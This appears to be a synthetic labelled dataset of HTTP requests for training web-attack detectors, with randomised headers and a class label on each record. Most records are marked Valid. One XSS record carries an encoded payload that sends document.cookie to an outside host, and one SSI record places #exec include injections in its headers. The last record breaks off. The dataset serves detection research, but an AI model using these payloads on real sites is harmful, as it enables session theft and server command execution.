Cookie2: $Version="183"
Date: Tue, 13 Jul 04 13:16:43 GMT
ETag: W/"hdp9GDa89lAkNgLbU"
Expect: xmzi9hnl
From: nnTrl@tt2dncfa.st
If-Modified-Since: Fri, 24 Nov 06 01:19:07 UTC
If-Unmodified-Since: Wed, 13 Jun 07 12:00:05 UTC
If-Match: *
If-None-Match: "l_Xf5gWUn6mv6Wx"
If-Range: *
Max-Forwards: 789
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ufOe"
Authorization: rdjt l8bs=latd
Range: 8-5728,5-967,67441-616423
Referer: http://hnshnoc.uk/pstyXy.exe
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.5 (compatible; 2ea7m; Open BSD i386; ykezic; gDfn)
UA-CPU: x86
UA-Disp: 564,248,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 109x8284
Via: FTP/8.3 219.103.87.66, 7.7 www.wSt3najr.htm
Transfer-Encoding: gzip
Upgrade: scec/4.2, i6ae/4.6, e1g/6.4, v4ttju/7.3, tro/7.6
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 139.143.108.151
X-Serial-Number: 5443838
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rleRd82cfiW2O=ig9ia)&san=ih&Lq-slink=1&sa0ue=0&tR0wNP7KRVq=rwy'nt9teh&eIeliihg6oa=tbO6Rss

End - Id: 4371
Start - Id: 8910
class: Valid
GET /4gcntn6nhhnaiqndro7/2rpQ2ddigy1kAEMM/thaubthgtoshothor1p/iotmotmdmhesxaib0iti/edbbRXcrrig8twte2/0up/liTAVGPfsCSVWo/uasoediwtN9/4tmpznG/neUUuXDg5H8D/tJoST1i/oZBdi2BO8z.php4? HTTP/1.0
Host: www.s39Ym.org
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: identity, deflate;q=0.1, gzip;q=0.6, deflate;q=0.4
Accept-Language: iwW-ieebcpx;q=0.6
Cache-Control: min-fresh=2351
Client-ip: 178.118.114.226
Cookie: enoiuaS=evalo6y;kiepudloeees=427
Cookie2: $Version="266"
Date: Wed, 09 Dec 09 04:48:53 UTC
ETag: "o_YERB0dpVOt2YXC"
Expect: d9ctOe=heth;tUanr5o=xgazT
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Sat, 13 Aug 05 08:10:37 CET
If-Unmodified-Since: Mon, 26 Sep 05 13:50:11 UTC
If-Match: "V_ZpS2be1Ns6TmB5x"
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: Sun, 14 Jan 07 15:00:50 GMT
Max-Forwards: 4
MIME-Version: 7.9
Pragma: u5stz=rmr
Proxy-Authorization: NTLM ZGVuZDRtZ2hyY3Jub29ld3RhZWZoZnBrc0E5T2NNZWVtcGlheGdIbEllUm1la2Rn
Authorization: fseee o0Niae=vmeluuo
Range: 7-3572
Referer: /ebcu/ntyohhuh/saeo/esineBnu.jsp
TE: chunked;q=0.4,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.3 (compatible; iiri; SunOS sun4u; palehao; enjhopwpt6; r3oattF3)
UA-CPU: 68000
UA-Disp: 7865,493,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: HTTP/8.3 145.159.52.95
Transfer-Encoding: deflate
Upgrade: oaefte/2.4
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8910
Start - Id: 22755
class: Valid
GET /tiotjhioeIyc9c1/hS32dziiRnpiHjado/M6UNC/pwraesaO7ee/tb7zEXcfevalMk/Nram0v/fwfbody.asp? HTTP/1.0
Host: 41.153.9.172
Connection: erug
Accept: application/*
Accept-Charset: x-mac-icelandic
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: tsetu='txartn'
Client-ip: 169.51.112.195
Cookie: rY3.71dtCkk=24;8Igekedr99xsatt=80;arieieeDEecE=31;nullsnetcatIagoFM7xp_4=yHla
Cookie2: $Version="05"
Date: Thu, 30 Dec 04 05:25:35 GMT
ETag: W/"VYWarfDOSm5pKt_9-"
Expect: idlEts=9pnbna
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Sun, 14 Mar 04 06:08:37 CET
If-Unmodified-Since: Wed, 05 Jan 05 06:37:49 GMT
If-Match: "9ltbX@K-bdAoQXs1rgUu"
If-None-Match: *
If-Range: "nQdT3ujvjWODaASa5y"
Max-Forwards: 50
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: Basic ZG9leW5mOmlsM2FPd3Q=
Range: 107-,-730361,-9
Referer: http://www.qsEo.com/niia/vrle/eghion.mdb
TE: deflate,trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/7.2 (compatible; ordNspPp; Unix; ir32rxthtm; adoet; etolp)
UA-CPU: 68000
UA-Disp: 156,3199,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 803x313
Via: 2.9 203.117.178.58, 2.6 182.219.60.245:18299
Transfer-Encoding: gzip
Upgrade: crGNN6/3.2, s85tN/6.9, i3wcat/6.3
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 247.95.67.80
X-Serial-Number: 46126280
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22755
Start - Id: 17575
class: Valid
GET /enae/c39dIB_k.23Tc.nsf?U2nrpxT=oTVWgZWDU5&htefe=qVN9DddcqXa&rrQz5=hEpr&EmyhseaPom=9&Wh7orRzCwgetl=-rcp+f+&wtoinmsxN=b60INRkbPi HTTP/1.1
Host: 219.211.127.80:2
Connection: drSEk3y
Accept: video/quicktime;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: eo-Tr7i;q=0.9
Cache-Control: max-stale=82331
Client-ip: 49.58.142.8
Cookie: lwhnoetn8Yqax=7712059640;Rchome9=260;6.BOz_XQBA7e=nesgoteehM;bt6moehaefg=394;sF2%uftpscriptI7@SO8=fXLsV_-;taahtoOcstierq=nM%7EH
Cookie2: $Version="383"
Date: Tue, 30 Oct 07 10:28:25 GMT
ETag: "yFsCQA0qcZwD8_Euq"
Expect: coAagde=eonelea;ssjo=rnlorne
From: toHtw@a9mti.it
If-Modified-Since: Mon, 01 May 06 02:28:46 CET
If-Unmodified-Since: Tue, 16 Oct 07 08:35:47 CET
If-Match: "pw7w_P_9hGXVhrePEH2"
If-None-Match: *
If-Range: Mon, 22 Sep 08 17:21:16 GMT
Max-Forwards: 08
MIME-Version: 3.0
Pragma: e='soozbls'
Proxy-Authorization: Ne0eoc jlottGkn=mmT0iei
Authorization: Basic c3Rsbzg6aGVlNWhCaHo=
Range: 22389-71,-169,-0
Referer: /enth/iroq/t6to9DOX.txt
TE: chunked
Trailer: From
User-Agent: Mozilla/4.1 (X11; U; Linux i386 7.9; pr-8m; rv:5.2.5) Gecko/19176599
UA-CPU: x86
UA-Disp: 1857,5660,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: 0.8 www.ouK58q5m.jpeg, 4.8 228.99.192.87
Transfer-Encoding: deflate
Upgrade: httos/8.2, cIe/0.7
Warning: 850 30.15.58.94 "mnoam98ReceIhnimaf" "Sat, 01 May 04 04:54:14 CET"
X-Forwarded-For: 203.39.140.226
X-Serial-Number: 2432854713
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17575
Start - Id: 13991
class: Valid
GET /7wBFTyJ.uxVR9XGd/OAaue7osqVM/oEKb.AP8/7A.ncM2-x0P/xbehettee7eNueyala/hfgP.r/d3c_R0h.jpg?lMwbncU6eis=14761&aoOaeinawrsM3=79171&icug=Efromn%3Frbd&cZ7QLAzm=rb6lrq2k0G&m6samKW5S=fklI5&eak1si=7254013223&ostimtn=tcA-rW%40&GKbSprocessing-instruction1havingutJSO=5735473 HTTP/1.1
Host: 112.227.218.161:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic;q=0.6, cp-932, macintosh, x-mac-japanese;q=0.7, isiri-3342;q=0.2
Accept-Encoding: compress;q=0.3
Accept-Language: *
Cache-Control: min-fresh=60
Client-ip: 223.82.61.56
Cookie: QUtFP@Knc=prtmahooesgepej;h09nehnnnarps=6725970659;ttmiemugavwwepy=8;rwa0=554389;k4= d
Cookie2: $Version="0"
Date: Tue, 23 Aug 05 18:04:02 GMT
ETag: "L-TQsQGzGcoyaScA1rs"
Expect: 100-continue
From: 4d2ea0hk@ieual.net
If-Modified-Since: Tue, 28 Aug 07 15:20:35 CET
If-Unmodified-Since: Thu, 11 Jun 09 20:50:11 UTC
If-Match: "WY-Gk4Y@69Z6B25"
If-None-Match: "Cku38mC70dUu_kEKQJ"
If-Range: Wed, 28 Feb 07 23:28:27 GMT
Max-Forwards: 6
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: jjvPD Tebkhb=8eehmla
Authorization: Digest algorithm=MD5
Range: 986633-,-445,64-7061
Referer: /hwa4yzii.jpeg
TE: trailers
Trailer: Accept-Charset
User-Agent: hmth0e1
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: tahiDt/8.8 www.gafqn.gif, 2.7 www.awaShe8f.jpg:23, 9.9 59.168.125.10
Transfer-Encoding: identity
Upgrade: fdtec/9.3, yna9n/5.0
Warning: 751 www.ninm.html "eskobLtz" 
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 738264285065396
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13991
Start - Id: 1032
class: Valid
GET /ueXj2aCNlDWa6stdina.cfm?sig7pk9l7nei=4183613912&nyJgz9e5awv=jn&H8UunetcatSobjectIpszcatF=O59teddh&iooyrdluac5Nonp=38770&uxiiLzplsz2reod=nTU&eetto=4 HTTP/1.0
Host: www.agaq.de:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 147.230.207.208
Cookie: ttauaceeirtiw=52i1a41If9en;fdocoeyd1seqe=;i[eiadropnte0dopositiona0oolt ;tell1pb=9219;ge=Fr<lnosystemeteNtOhp;ocivtnyecuftrr=0IFjoFYZ77L
Cookie2: $Version="135"
Date: Mon, 22 Jan 07 14:06:15 GMT
ETag: W/"yDBLKP4mGSzcRpCuZ9CS"
Expect: mraoe
From: lSpom@es6vknOma.biz
If-Modified-Since: Sat, 28 Mar 09 03:50:42 GMT
If-Unmodified-Since: Wed, 30 Nov 05 06:08:05 UTC
If-Match: *
If-None-Match: *
If-Range: "qsGyYbjVRISMD2w"
Max-Forwards: 51
MIME-Version: 8.6
Pragma: ino=rdfy
Proxy-Authorization: id7l4l x1fuyra=sVlhNT
Authorization: Basic Zm5tZGRod2k6czNwZQ==
Range: 339-65412,180-85,-47
Referer: /ePs6kmt/8dbokdG/lntle/DtagpHi.php
TE: chunked,gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/7.8 (compatible; MSIE 3.5; Unix; aLhT; rxegrs)
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5033x777
Via: HTTP/3.6 www.ozc48rci.htm:4052, 9.2 244.70.59.206, sssnl/5.2 195.85.182.201
Transfer-Encoding: deflate
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 976 www.rhtLT.css "c1yti6plTceoEa5eim0a" "Sat, 16 Jul 05 16:22:57 CET"
X-Forwarded-For: 101.119.184.116
X-Serial-Number: 3135796940
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1032
Start - Id: 16679
class: Valid
GET /iOoo/eB2tt/nD4RnEs2h4fYoris.html? HTTP/1.1
Host: 196.218.115.152
Connection: 9ecase
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 205.215.21.148
Cookie: servicesdfvbscripts1Lf=82;S7BFZPT=1
Cookie2: $Version="672"
Date: Mon, 24 Oct 05 14:33:50 GMT
ETag: W/"CR9YJEZcRkY8H3XaQ1"
Expect: 100-continue
From: noedlreb@rlhth.be
If-Modified-Since: Sun, 24 Sep 06 09:57:35 GMT
If-Unmodified-Since: Wed, 07 Jan 09 14:50:47 CET
If-Match: "YxFY8bdO_x9ZMpEIqVK7"
If-None-Match: *
If-Range: Fri, 19 May 06 13:16:07 GMT
Max-Forwards: 9
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: uri1dE s0On=i9raA
Range: 251-5
Referer: /ilhioTrh.ace
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: t4yD3D http://www.orAedtia.biz
UA-CPU: 68000
UA-Disp: 0786,0517,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6609x7402
Via: 4.3 www.fueteo.htm
Transfer-Encoding: compress
Upgrade: bloll/7.2
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 93584003458
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16679
Start - Id: 21104
class: Valid
GET /nthhsoaymce/hsystem/ai3l7oaneybtc7r3aans/G7CaP7aODMPk/fcierd/3id/epqfb/igeir2.shtml? HTTP/1.1
Host: www.vMgcchxn6t.uk
Connection: close
Accept: video/*
Accept-Charset: iso-8859-8-i;q=0.8, cp-932;q=0.3, us-ascii;q=0.8, cp-932;q=0.7, x-mac-chinesetrad;q=0.4
Accept-Encoding: compress;q=0.1, deflate, gzip, identity
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 41.159.222.224
Cookie: ou3gt=Ilogyaselect
Cookie2: $Version="9"
Date: Sat, 27 Aug 05 10:33:49 UTC
ETag: "bEGyFS.RFNQ4ovS471"
Expect: hepthn
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Tue, 09 Mar 04 11:20:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: Basic T2UxczpIT2tlMw==
Range: 72-,4-191
Referer: /Aa6ds/wsssem/fAemljvo.sh
TE: trailers
Trailer: Via
User-Agent: Mozilla/4.8 (X11; U; Open BSD i386 3.1; ek-xy; rv:3.1.3) Gecko/88002173
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: 8.5 56.51.254.48
Transfer-Encoding: identity
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 183 155.105.82.2 "rsureli4" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 0274722
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21104
Start - Id: 47053
class: XSS
GET /gFy24a-D2homemfU/4v8athPty7/5gL79BZ.jTZH/Nboot.iniIt/Ec-lEsMBPAHqEX/tDkh.shtml?ITNmochabinSbEvE=236726702&ieltend=tj+dduMrw&t4gne3asco0zeed=114&6udpli=okfste4hqF&WcbkiOWVQdpassthru=vWPBJ&EarntROtteh=212366&oeggraeh=%26%7B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ar.com%2Fcgi-bin%2Fngol.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B HTTP/1.1
Host: 168.26.151.53:12
Connection: close
Accept: text/xml;q=0.5, text/*
Accept-Charset: euc-jp
Accept-Encoding: compress, compress, gzip
Accept-Language: *
Cache-Control: max-age=60565
Client-ip: 66.107.218.203
Cookie: inaghui=T3hm
Cookie2: $Version="71"
Date: Fri, 25 Mar 05 08:43:43 GMT
ETag: "v3TftZeHd8EU2vMvbiP"
Expect: 100-continue
From: hhas5f@maUt8ekaSt.biz
If-Modified-Since: Sat, 16 Jan 10 13:50:59 UTC
If-Unmodified-Since: Thu, 06 Jul 06 20:54:03 GMT
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: "HlvHJeL3e74XTBHap"
If-Range: *
Max-Forwards: 28
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest nc=39Ce4CfC
Range: 388869-790680,430-,-04157
Referer: http://tnOftasE.gov/ohestt/rSsengag/geBnc/etarlue.cfm
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: mn6ajii/7.6.0.6
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 7.1 204.241.251.133:98584
Transfer-Encoding: rehi; dbnn=Attrnfte
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 964 245.225.40.21:93731 "csa6ao3oxtd9hnfoert" "Tue, 16 Nov 04 02:10:40 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47053
Start - Id: 34900
class: Valid
POST /zt@PwnxdjBD-TOKHpiNb/nng@PFbsOjuK/el9tl0emeunN5riewcSt/iHK-6o0OO/9ottttegdyye6b74t/tstmcceeiun/n1YUCciCzjh8iW4.shtml? HTTP/1.1
Content-Length: 71
Content-Language: y,fwrrma,ctlorot
Content-Encoding: deflate
Content-Location: /nsndesd/ceyh/edty.php4
Content-MD5: Y2NFYWNjcG5hd29leWV5dg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Dec 08 18:31:42 UTC
Last-Modified: Sun, 11 Nov 07 04:12:44 UTC
Host: 115.36.244.227
Connection: idne
Accept: audio/x-wav
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: aswLaud-trtdeo, eug-0nithonh;q=0.4, e0-hlin;q=0.0, igothy8-iwtaind;q=0.7
Cache-Control: max-age=54
Client-ip: 180.36.30.16
Cookie: aaH4tdfedI=igVqrFkP;3elhnhudteao=Nmaksudroeccz;ane=asutsenyie;meNT=0itl;shmwgleein=6487683;iiq=mho
Cookie2: $Version="3"
Date: Tue, 02 Mar 10 06:54:55 GMT
ETag: W/"kNFmd3AB7itFr6m8dbrS"
Expect: 100-continue
From: auaes4Eh@tlwea3.gov
If-Modified-Since: Fri, 01 Dec 06 22:42:12 GMT
If-Unmodified-Since: Sat, 20 Nov 04 13:03:41 UTC
If-Match: "Db@4NzfPyl94n_l_1bsT"
If-None-Match: *
If-Range: Mon, 04 Jun 07 15:38:59 UTC
Max-Forwards: 32
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Digest qop=skneve
Range: 04519-,499-
Referer: /mipnRva/mo36su7h/alpp.php4
TE: chunked;q=0.6,deflate;q=0.6,gzip
Trailer: If-Modified-Since
User-Agent: r6UxKO http://www.arwHa.it
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: 1.2 www.vudoogzE.png, FTP/7.1 www.heeern.htm:6074
Transfer-Encoding: deflate
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 293 www.ds0swdh.css "fM4geas0hcalM" "Sat, 19 Aug 06 22:31:17 GMT"
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 373470413656651494
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rhrpEsrw=2&hntiogsg=se>grmtcfoeexecy&ss=ghTkg&etIts8nyiq=ataoetp1b5mA

End - Id: 34900
Start - Id: 27585
class: Valid
GET /ogxnull5binoJ_/6Llink9metadrop/u-XcEvms/rR.bin?wnt=5691&satmtit=88421&dmitbiltigz=wxnr&Gaas34zpi=wc+4b0dthlgyghOcmdttca&saitlebdpBtip=Uabevsanuwi&anHidomcdedt=zNmrBbnsorfendsed&llln=30955&asd8lerE=bmr%3FrNG5un&or5osceaetOo=tBNm9V3&@T7w=hniboxmlheyro&div4open_passthruK=%40&Eugy=r2eA&aep3ieziiSiy=Aial%27lriP&PSh4it4s5r=%2Foogtei%26i+%40 HTTP/1.0
Host: 70.89.122.33:8
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 62.241.68.195
Cookie: z6dasat=plm7
Cookie2: $Version="629"
Date: Sun, 13 Dec 09 21:49:52 CET
ETag: "KVtY7dYtV4waMq2VI35"
Expect: dWElslca
From: vumaCtt@lcmSrhje3.gov
If-Modified-Since: Thu, 25 May 06 18:45:30 GMT
If-Unmodified-Since: Mon, 23 Mar 09 03:12:39 UTC
If-Match: "mIk2d6l4MiBSuvdDe4j"
If-None-Match: "ysYfhRJC0Dzy0vc"
If-Range: Thu, 29 Jan 09 16:17:19 CET
Max-Forwards: 6
MIME-Version: 6.9
Pragma: OImyfnL='eac'
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: eeao etii=rnou4eyr
Range: 29139-636434,80033-87
Referer: /oiidiqCh.avi
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 1.5; a1-oN; rv:4.1.5) Gecko/47201474
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 034x602
Via: 2.0 60.145.144.221:39
Transfer-Encoding: gzip
Upgrade: teoevo/0.3, snoPeb/0.1, 2nelh/5.8
Warning: 166 www.i7eiao8.css "sae2iarEaeg" 
X-Forwarded-For: 164.135.194.215
X-Serial-Number: 981002451847227
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27585
Start - Id: 33362
class: Valid
PUT /el1Y9FhZ_/nqOXpZ92V3M_cxAn3e/8PoLt.html? HTTP/1.1
Content-Length: 70
Content-Language: tytrgmmt,0t,aans
Content-Encoding: identity
Content-Location: /e7eceshe/dsEdteAr/rn3oLSl/as6a/e1atyv.pdf
Content-MD5: YXRpc2lubm5uaXdybDFUZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Dec 08 06:27:51 UTC
Last-Modified: Tue, 20 May 08 13:16:22 CET
Host: 126.53.224.195
Connection: close
Accept: video/mpeg, application/postscript;q=0.6, image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: s-AlTh0nbs;q=0.5, cucsT3es-pm;q=0.2
Cache-Control: max-stale=84803
Client-ip: 194.231.198.230
Cookie: 9eevin=r;Pl4tS_GU2Vn=ekpthshutdownol;je=59250;eevfReeeOfy=IHhqe;ontsndtat=;bOfrom0tenh
Cookie2: $Version="1"
Date: Sun, 20 Apr 08 23:04:29 CET
ETag: "HTeaV3unk6Zkq-7EKBuw"
Expect: 100-continue
From: EinolCd@e1annaob6.gov
If-Modified-Since: Tue, 27 Apr 04 15:38:24 UTC
If-Unmodified-Since: Sat, 08 Nov 08 05:43:11 UTC
If-Match: *
If-None-Match: "De8MnyR8KVK9mqfOo6h1"
If-Range: Sun, 08 Feb 09 24:43:36 GMT
Max-Forwards: 38
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic ZWlnck1oZXQ6eXNVbnZyZQ==
Authorization: Digest cnonce="Ets6nc"
Range: 739780-992,95518-8
Referer: /u5ohcne5/1feEsJhc/flif/ijtfsH/S2ao.sh
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: lufd (rAD4JQi; mu3UZjY@i; lTW12SAm; zrqxbD)
UA-CPU: MIPS
UA-Disp: 6397,158,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: 0.5 22.199.40.248, HTTP/9.2 218.71.70.33
Transfer-Encoding: ihss
Upgrade: tqo/8.5, hd7t/7.1
Warning: 024 183.247.152.106:01 "caee7oieenaqu19hTsdR" "Wed, 15 Apr 09 07:52:38 CET"
X-Forwarded-For: 113.32.119.185
X-Serial-Number: 93235551323019151899
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aopeConoti=4&brnpnebtv=4ekygaWcdOonenh1y&ri=b oarun%hwdi<1nselectn

End - Id: 33362
Start - Id: 25178
class: Valid
GET /INEHVyhttpsJWW5Ks/f.@S3Zhe/toI7eeodnfbe0mSu0/rteadiTp/syt9JzUT2Ad7_/eTe0Z.swf?aem=icbaleeo HTTP/1.1
Host: 89.143.145.70:3810
Connection: 1reeR0tb
Accept: video/*, application/*;q=0.4, image/gif;q=0.3
Accept-Charset: x-mac-roman
Accept-Encoding: compress, gzip, identity, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 56.216.77.220
Cookie: sndt=2;ietajseosg=31;ardN2qlLbr=69221716;Rxs57HocPR=oe
Cookie2: $Version="787"
Date: Wed, 20 Dec 06 04:25:25 UTC
ETag: W/"hAqlYd2Sq6tOVY8lO"
Expect: 100-continue
From: eVi2la@nsi2e.gov
If-Modified-Since: Fri, 13 Jun 08 05:44:35 UTC
If-Unmodified-Since: Thu, 10 Dec 09 19:16:38 CET
If-Match: "D5ULEZCR17_-ynMRdSNI"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM eHVjMWU5b2lodGVzdG9Jd1R6Zm9kbW5paGgyck9hRTc=
Authorization: Ttxai nEcrn=en0nN
Range: 82-7262,2-,43018-
Referer: /oeon/tesmnb/nwndtrB.ace
TE: trailers
Trailer: Via
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 6.1; 1l-am; rv:1.8.8) Gecko/69426648
UA-CPU: 68000
UA-Disp: 550,936,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5457x802
Via: FTP/1.5 www.1phDn.htm, ateraN/8.6 196.47.255.38, HTTP/6.1 www.d8nleeu0.gif
Transfer-Encoding: identity
Upgrade: tIis/4.6
Warning: 916 29.90.96.90:39 "ntz1w0fhvsoy" 
X-Forwarded-For: 23.5.186.247
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25178
Start - Id: 39472
class: SSI
POST /oCc9itH/iVg/rQARJToSvXPZujO/MGyparmzos/stoiBe5erReovr/sakd9eExtte/nhzeNn/eIyX0VZo_jYwj-Y88gcx/C5TUCQF52syr4/sm.cgi? HTTP/1.0
Content-Length: 205
Content-Language: lnn
Content-Encoding: gzip
Content-Location: http://vGrip1dl.fr/Noms/lIt9/llrT/daneala/jseeUdi.pl
Content-MD5: anRpbm9iZGVsblQ0ZGFwbg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 09 Aug 05 06:53:15 CET
Host: www.axrsbe.st
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-874, windows-1254;q=0.8, utf-8, cp-950;q=0.9
Accept-Encoding: <!--     #exec  cgi="/cgi-bin/script?qrcieeeiyh"   -->
Accept-Language: <!-- #exec    cgi="/cgi-bin/script?lwomlsr"   -->
Cache-Control: only-if-cached
Client-ip: 188.172.112.94
Date: Sun, 01 May 05 07:51:38 CET
Expect: Efvkeonb=egfred
From: zO5ldjrt@WIls.cz
If-Modified-Since: Tue, 10 Jun 08 03:43:18 GMT
If-Unmodified-Since: Thu, 18 Mar 10 20:40:45 GMT
If-Match: "4tUhl.@ZykD3z7Z"
If-None-Match: "vQxRp.o.Yu.pbjV7"
If-Range: "eUBKF3H5UHgaN1xabUxc"
Max-Forwards: 36
Pragma: no-cache
Authorization: lgnId auko43=Swctiz
Referer: http://iHllgc.cz/llnpp.jpeg
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 3.6; po-at; rv:5.5.4) Gecko/64601947
UA-CPU: Sparc
UA-Pixels: 8114x0121
Via: 9.2 221.109.40.80
----: ----------------

icd=9732005&5systemBWC0q=2&mj=1iY3as&1rn6na2thentziu=0910&9wnnyqsoi=963&iaeatgozo=%5lf)shfr %ssuadminer2o&to1I=eh4aroyhadauoygn&e7nReaca=el95&re4o77nemismv7a=262544&tlhnnmaiecpg=shromne7IhezvsG&n6j=4

End - Id: 39472
Start - Id: 17181
class: Valid
GET /formvbscriptU/0aSdeletepnK-v/sYub9G5T8fAB1yJwlrKI/zzmO3B4/JfvK0v6gQi9LA/t9h/uounTt/dYUr/passthruu9Y/5ZnD8l4.mdb? HTTP/1.1
Host: 0.196.235.120
Connection: 7art
Accept: video/quicktime;q=0.4, application/*;q=0.9
Accept-Charset: x-mac-greek;q=0.0, windows-1257, isiri-3342;q=0.1
Accept-Encoding: gzip, deflate;q=0.9, deflate, identity;q=0.0, gzip
Accept-Language: dunEeel-Iu9am5ye;q=0.9, RopEo-temE
Cache-Control: no-store
Client-ip: 72.247.208.207
Cookie: snmleztzaennegi=%gn%;ltsYeP=055824
Cookie2: $Version="07"
